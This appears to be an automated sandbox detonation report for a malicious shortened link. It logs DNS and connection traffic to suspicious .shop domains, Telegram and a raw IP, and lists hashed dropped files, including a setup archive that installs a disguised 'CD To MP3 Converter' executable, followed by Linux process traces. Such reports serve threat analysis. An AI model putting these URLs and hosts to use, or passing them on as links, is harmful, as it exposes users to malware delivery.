US 8.8.8.8:53 171.211.67.172.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 oasqi.nxt-psh.com udp
US 8.8.8.8:53 mc.yandex.ru udp
US 172.67.194.119:443 oasqi.nxt-psh.com tcp
US 172.67.194.119:443 oasqi.nxt-psh.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 nxt-psh.com udp
US 172.67.194.119:443 nxt-psh.com tcp
US 172.67.194.119:443 nxt-psh.com tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 119.194.67.172.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 172.67.211.171:443 ify.ac tcp
US 172.67.211.171:443 ify.ac tcp
RU 77.88.21.119:443 mc.yandex.ru tcp
RU 77.88.21.119:443 mc.yandex.ru tcp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 119.21.88.77.in-addr.arpa udp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 mc.yandex.com udp
RU 77.88.21.119:443 mc.yandex.com tcp
RU 77.88.21.119:443 mc.yandex.com tcp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 soneremonasez.shop udp
US 172.67.180.145:443 soneremonasez.shop tcp
US 172.67.180.145:443 soneremonasez.shop tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 145.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
GB 95.100.245.168:80 x2.c.lencr.org tcp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 google.com udp
US 172.67.180.145:443 soneremonasez.shop tcp
US 172.67.180.145:443 soneremonasez.shop tcp
GB 142.250.200.46:443 google.com tcp
GB 142.250.200.46:443 google.com tcp
GB 95.100.245.168:80 x2.c.lencr.org tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 95.100.245.168:80 x2.c.lencr.org tcp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 senzamenuzaes.shop udp
US 104.21.70.174:443 senzamenuzaes.shop tcp
US 104.21.70.174:443 senzamenuzaes.shop tcp
US 8.8.8.8:53 174.70.21.104.in-addr.arpa udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.142.163:443 www.bing.com tcp
GB 92.123.142.163:443 www.bing.com tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 144.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 163.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 soneservice.shop udp
US 172.67.164.12:80 soneservice.shop tcp
US 172.67.164.12:80 soneservice.shop tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 12.164.67.172.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 telegram.org udp
US 8.8.8.8:53 cdn5.cdn-telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 34.111.108.175:443 cdn5.cdn-telegram.org tcp
US 34.111.108.175:443 cdn5.cdn-telegram.org tcp
US 172.67.164.12:80 soneservice.shop tcp
US 8.8.8.8:53 o.pki.goog udp
US 172.67.164.12:80 soneservice.shop tcp
GB 216.58.201.99:80 o.pki.goog tcp
US 172.67.164.12:80 soneservice.shop tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 36.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 175.108.111.34.in-addr.arpa udp
US 8.8.8.8:53 z3n.mom udp
US 172.67.137.159:443 z3n.mom tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.111:443 net.geo.opera.com tcp
RU 95.163.241.63:80 95.163.241.63 tcp
US 172.67.164.12:80 soneservice.shop tcp
US 8.8.8.8:53 slatevision.org udp
US 172.67.164.12:80 soneservice.shop tcp
US 8.8.8.8:53 159.137.67.172.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 63.241.163.95.in-addr.arpa udp
US 198.54.117.242:443 slatevision.org tcp
US 172.67.164.12:80 soneservice.shop tcp
US 8.8.8.8:53 242.117.54.198.in-addr.arpa udp

Files

memory/620-16-0x0000025150220000-0x0000025150230000-memory.dmp

memory/620-0-0x0000025150120000-0x0000025150130000-memory.dmp

memory/620-35-0x000002514D5E0000-0x000002514D5E2000-memory.dmp

memory/4264-44-0x0000023558540000-0x0000023558640000-memory.dmp

memory/768-68-0x000001C1D9280000-0x000001C1D9282000-memory.dmp

memory/768-66-0x000001C1D9260000-0x000001C1D9262000-memory.dmp

memory/768-64-0x000001C1D9240000-0x000001C1D9242000-memory.dmp

memory/768-112-0x000001C1D9D60000-0x000001C1D9D62000-memory.dmp

memory/768-110-0x000001C1D9D40000-0x000001C1D9D42000-memory.dmp

memory/768-108-0x000001C1D9D20000-0x000001C1D9D22000-memory.dmp

memory/768-106-0x000001C1D9D00000-0x000001C1D9D02000-memory.dmp

memory/768-114-0x000001C1D9E70000-0x000001C1D9E72000-memory.dmp

memory/620-133-0x0000025157020000-0x0000025157021000-memory.dmp

memory/620-132-0x0000025157000000-0x0000025157001000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\3WNUAE56\favicon[1].ico

MD5 de5a68ecf1315791471000eea42de65d
SHA1 3f3e7239d7ec1702868f51e9d28e528c6c60e984
SHA256 fb94090003c3fd820119448548cb3f11a37304608d1f7401824111f53cfbe61f
SHA512 0b5b8b073714ec8e0cd1992d722c669515ce589d14f4dc224e9c1830c4aa8d3473c441758f8128f381607c85acfd015b1fa0f271c4595c33f4d162eab69f2501

memory/768-153-0x000001C1DA4E0000-0x000001C1DA5E0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\KARBE3VI\ify[1].xml

MD5 d29e56bc266585d73b228acb90e44969
SHA1 7af3719594b9968636b83c85bd98b99ae6aeae43
SHA256 b484182983668a91a42087f966decd9a77a4c46cf29768c3eef5a643bc1cf4af
SHA512 fe842128c085ec343d3b41afce3c7d6c5a05744637271e2d6c115d7c26c2bb9642997827c007b188eb3236f1fd935d0f5113a2522e0e94231d504d69c55e2d00

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\KARBE3VI\ify[1].xml

MD5 e15afcbcf40332132dc4142447d6ad5e
SHA1 9e75cc874415dcd7f5f90e86d76e67f27879b241
SHA256 84ad5f3a13c9b3e62434d0a7c510890ed2b1c1a49f94186fcce7a7d2bcee55ba
SHA512 b8ea03f1b202ae964a9342c12b6b4476834ebd4ba9109357589b4df2d9c4c3c02f1b13557359f9bef2d0e3d810e3d289b054934bd481d70347b08885678b721b

memory/768-388-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-389-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-390-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-391-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-392-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-393-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-394-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-395-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-396-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-399-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-398-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-397-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-401-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-400-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-402-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-403-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-404-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-405-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

memory/768-406-0x000001C1C8950000-0x000001C1C8960000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\XCFODRP5\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

MD5 8d1040b12a663ca4ec7277cfc1ce44f0
SHA1 b27fd6bbde79ebdaee158211a71493e21838756b
SHA256 3086094d4198a5bbd12938b0d2d5f696c4dfc77e1eae820added346a59aa8727
SHA512 610c72970856ef7a316152253f7025ac11635078f1aea7b84641715813792374d2447b1002f1967d62b24073ee291b3e4f3da777b71216a30488a5d7b6103ac1

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

MD5 837ac602682a31cbd9d231fc340a8dd0
SHA1 14de92e53036bd5a2c03da8fbcaf420028f4d18f
SHA256 666c3bf4d9429b965e368401bbb92e7c48dcd0f6f394ae60234c39219b9fe358
SHA512 631df75f8d0fad679586a4e5732be5136d31a949467fd2a871d0f5cf725e27fceab9980c7dd0a169b8c6f5f84bf98b2b4a66f35daa30fcc07d6cc1a9558dfeb3

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 02e5a8e9354c7a98b0e7e81f94bc130f
SHA1 8bc77fba7a15f8be310dcff79abd1224863abec1
SHA256 182f630ced4deeaf2f14fde10db2df0f80c3c2561fd6a4ed3e1e35677e44a7ee
SHA512 df8134e264f87eea3ad67f2cc13c6ec752ac37b8cbb793376606a5e174b60310372b3072a4d2c495d13ac7b1a8dd3fd4c595fc54c32dbede3fc0328010839081

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 731cad8b9ed646924ae9eb1dbb820a76
SHA1 364b0636b0fb903577d334a1f9d2882219923e9c
SHA256 5af6d47a048f6e6647a609948a0c052f094a37b89a70132a30a2d2f078893fe2
SHA512 7a2bfc69b68fd9cb9eb54864a7bd9106333775eff0c2920081d4263d94309da42fdd9c8b47a93d02c895eea1b2dfb31df4d5587442cade4f73be36bc7b8334d7

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_857450206B889F4FEA0F888FA03D68DB

MD5 090f56ceff2e17497a8122e8108115f0
SHA1 33cff43a61846cf1584aaaca78f151228766f12f
SHA256 e8714c50267df7fee7dcbe8c923aa1e2acbfdfec48dfd93ff048f9394a58fc71
SHA512 3346a12bf270f4506623e6f72e03ac615e5a0380b7fe493ce11634d41eed6dd4197cd574c0adbe190c1961204d01498aea29f8c2e95af9f8a22be67a8ebbce46

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_857450206B889F4FEA0F888FA03D68DB

MD5 8849c880473c0a45f0e64363f0cd48dc
SHA1 cc9a64b240809c10559fd1cac6cc307fee4c180b
SHA256 d9aeaa396352867dd17bb4f69a0045aa72637936c317ac2efbe5caad2aa592a3
SHA512 5321a75d61405ace572c90e1cd912d6579e7d830ff6fc9dee6ad4411797ddf8b8c898e780f9a81ea7cd9fd5a0eeceeeb7beefa3682dbba4b98466a5f4900452a

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\90MKKRR5\recaptcha__en[1].js

MD5 93e3f7248853ea26232278a54613f93c
SHA1 16100c397972a415bfcfce1a470acad68c173375
SHA256 0ec782544506a0aea967ea044659c633e1ee735b79e5172cb263797cc5cefe3a
SHA512 26aca30de753823a247916a9418aa8bce24059d80ec35af6e1a08a6e931dcf3119e326ec7239a1f8f83439979f39460b1f74c1a6d448e2f0702e91f5ad081df9

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\01IWO00O\www.google[1].xml

MD5 98006691abc4ceda10ab27e9a1209e4f
SHA1 2ba30d9bb86da27f48c9deba3b79a19d93fdfe8b
SHA256 977b215324743c9c0aece1231394bdde795cd2c79647ed70ffff79433d61f039
SHA512 8aeb4edd90231ba4a598f6e57e7fa8001fabfe4e0f189127221279365919ffd2d3ee38c77ec013223f5d7c09c95959f30ef52513bd90913e8e80a2ea0dcaa682

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\6BFJQXVB\bootstrap.min[1].css

MD5 6d9c6fda1e7087224431cc8068bb998f
SHA1 6273ac1a23d79a122f022f6a87c5b75c2cfafc3a
SHA256 fb1763b59f9f5764294b5af9fa5250835ae608282fe6f2f2213a5952aacf1fbf
SHA512 a3f321a113d52c4c71663085541b26d7b3e4ced9339a1ec3a7c93bff726bb4d087874010e3cf64c297c0ddd3d21f32837bc602b848715eadd8ef579bfe8e9a9a

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\6BFJQXVB\bootstrap-icons.min[1].css

MD5 e8f9bf6bffd8e881edf8d6880608421f
SHA1 7712bcd53b975e0ec26af2af51c2098ff5bd25d8
SHA256 ee16c135f599c64d3ae35ed65466b5ae1f91d2bac858f8701b76213565a0e664
SHA512 633c0680574ed4d430d426643e81b2464127513c4f49b1965ef1a25eb5a4f08792a9dc9c8b47440d874b2e3331ab5cc2a14d1005ae241c016246150bdf3d9ba3

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\7GPGADG0\styles__ltr[1].css

MD5 4adccf70587477c74e2fcd636e4ec895
SHA1 af63034901c98e2d93faa7737f9c8f52e302d88b
SHA256 0e04cd9eec042868e190cbdabf2f8f0c7172dcc54ab87eb616eca14258307b4d
SHA512 d3f071c0a0aa7f2d3b8e584c67d4a1adf1a9a99595cffc204bf43b99f5b19c4b98cec8b31e65a46c01509fc7af8787bd7839299a683d028e388fdc4ded678cb3

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\502XJ358\api[1].js

MD5 a93f07188bee2920004c4937da275d25
SHA1 901cfea09bc88d26a55cf2c57ccdaf45dfaea95a
SHA256 587d5394ddb17dec6f39de2e973431f161a1e08a45d499fe7c7a6333a93904cd
SHA512 16855a943a768355129e31623e5eb7064741d4d07ac2c0fcd21c5742a1b2e2a2c3af38e0f481bd7b8006dc96c408be07b91bbbe28ce7c4f7f0f7d53e427500c9

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\502XJ358\QR5Eh00-DY-sP8PcJ5iIzhz00opxPFI30kmgY8y9GnU[1].js

MD5 142ad35a28d4cfa91655c971bdcc8c21
SHA1 a2ebf958fffaf5dae9855080c6687e0127f51cc3
SHA256 411e44874d3e0d8fac3fc3dc279888ce1cf4d28a713c5237d249a063ccbd1a75
SHA512 a1591f1b237541df648ace2fa8b22712fa2e930977004818ee20ea05757fc8bd54febb344dcdce6354ae9d6b7fc2f8d7eada88c05593cca56c3d85996ea0b089

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\7GPGADG0\webworker[1].js

MD5 f66834120faccb628f46eb0fc62f644c
SHA1 15406e8ea9c7c2e6ef5c775be244fe166933bfcb
SHA256 8f063ae681a530a407ea4d17859790d9e45fd81ce5b3bb6202fc9e30cef95996
SHA512 7c596e61967fe787bc29d262c945d7eb4e02f9f574d3c8c664f333c9c3b4dd4aff1dfcde8f34be1acfaf8c05423c1c118a4bfd50684a7cd9f90e5f40fbc89653

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\90MKKRR5\setup_woMGQPOBj7[1].zip

MD5 9c21e9c1f627e4715f24aad38f78d2ae
SHA1 5f612a24df8fd4fd0d867ba605bd34b29c6020e3
SHA256 e645f5c9d17da8bf1dd16e19db3cc44795aac3b52d7fd1791ddae1d940cbb129
SHA512 611b1aa63f465bbd4b40c65e06d5c75736931c03fa16a539b86a29531e8e0831c37cf097ebbc4867909556f1afb42f544736b3541a8edb586539992489999878

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\BFW8BSZG\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\setup_woMGQPOBj7.zip.i2yvpnb.partial

MD5 f1cf45b7b61e00c6d4cb7e8adc122d36
SHA1 218f555adc318775180e3528d2ed994d5244cb5f
SHA256 f892fc1ad1e694e442a69b8a70ed5bd5901260af658c5ae1bdadbbaf3b549d52
SHA512 08b777f3abdbe5089237620abd2812672b778a550f927c05fcdefded05beec993d02251060a2b1f4cf60493d3be606a4b702c61c3fc0123f9378c66a7e472a42

C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp

MD5 4b0524fa48ddc6b8d8191ef7a213b2e6
SHA1 d05ecb09aadbde153ad37c67db8b0206efa1fd37
SHA256 43af110947449a12b150169d107ff3d7cd103801e5dadf6485cdc719e185bde6
SHA512 4d29764c488281586dbcdb5eeb10a8924ab689ddc839b08b779c98e26eec8460aac531b156eafb937192bce486bee89bc117e47aa1ae4d7045ff72ff813d78bf

\Users\Admin\AppData\Local\Temp\is-KATFL.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe

MD5 7f2c34b6c0c8680f35a234077c40ee51
SHA1 e83cd07646f25afccda2ff63f7035d147268b264
SHA256 a8d33c8ae6df133bebbaebc079225aa6662cad3413a36feefe29c1ac6e3ce474
SHA512 8633680cd10b6ba33831c3962dceecef234b16b328c6f32dd1146a89b42738bdb02e91c1ebe2799e1a4f578050ee1d32b36cbcc92c0b26f0a28d59613a60014f

memory/4908-2311-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\3WNUAE56\website_icon[1].svg

MD5 02f7553e1ac3129cd1c4d0442b5a0f81
SHA1 0dd8634450681fe1a2d0c1e5b02d6d0954e2772d
SHA256 0019255c610cb0843c524d7995905fa5201651fcc393846bee8414f0610097f5
SHA512 ac141a5648a3a22ceb295de8ecc6823f53d2a453316cd591dde888715344a60694316e1b85a5ceec72af62e34cc3d01768b020e5dfd5e0cb9916ec975ba4318e

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\BFW8BSZG\favicon-32x32[1].png

MD5 16a75c7824b5223b8e22864354e9e33f
SHA1 2c35e76ebe2d8002369d582b32bd70374552c574
SHA256 7f3e38478d53875c1f35d67fc035067274bacf9df8285889ad04fb143dfdddd8
SHA512 bd09744894646081e02b9e730c68c82354e3907c419578bdcb45d52c99d909d78ee084c8948b99d14ac6c8dfb343c9eb9197af039c5ac99d356440efd10a4ee8

memory/4908-2487-0x0000000000400000-0x0000000000D15000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-14 17:56

Reported

2024-07-14 18:01

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

258s

Command Line

[xdg-open https://ify.ac/1Ic5]

Signatures

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner N/A N/A
Changes the process name, possibly in an attempt to hide itself gmain N/A N/A
Changes the process name, possibly in an attempt to hide itself dconf worker N/A N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/kernel/security/apparmor/features/namespaces /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/io_uring /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/mount /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/network /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/ptrace /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/signal /snap/bin/firefox N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/caps /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/file /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/rlimit /snap/bin/firefox N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/lib/snapd/snap-seccomp N/A
File opened for reading /sys/kernel/security/apparmor/features/dbus /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/domain /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/network_v8 /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/ipc /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/policy /snap/bin/firefox N/A
File opened for reading /sys/kernel/security/apparmor/features/query /snap/bin/firefox N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/filesystems /usr/bin/gsettings N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/sys/kernel/random/uuid /snap/bin/firefox N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/mounts /snap/bin/firefox N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/mountinfo /snap/bin/firefox N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/gsettings N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/cgroups /snap/bin/firefox N/A
File opened for reading /proc/cmdline /snap/bin/firefox N/A
File opened for reading /proc/2396/cgroup /snap/bin/firefox N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/gsettings N/A
File opened for reading /proc/sys/kernel/seccomp/actions_avail /snap/bin/firefox N/A

Processes

/usr/bin/xdg-open

[xdg-open https://ify.ac/1Ic5]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/grep

[grep -q ^file://]

/usr/bin/egrep

[egrep -q ^[[:alpha:]+\.\-]+:]

/usr/local/sbin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/local/bin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/sbin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/bin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/bin/sed

[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]

/usr/bin/xdg-mime

[xdg-mime query default x-scheme-handler/https]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/grep

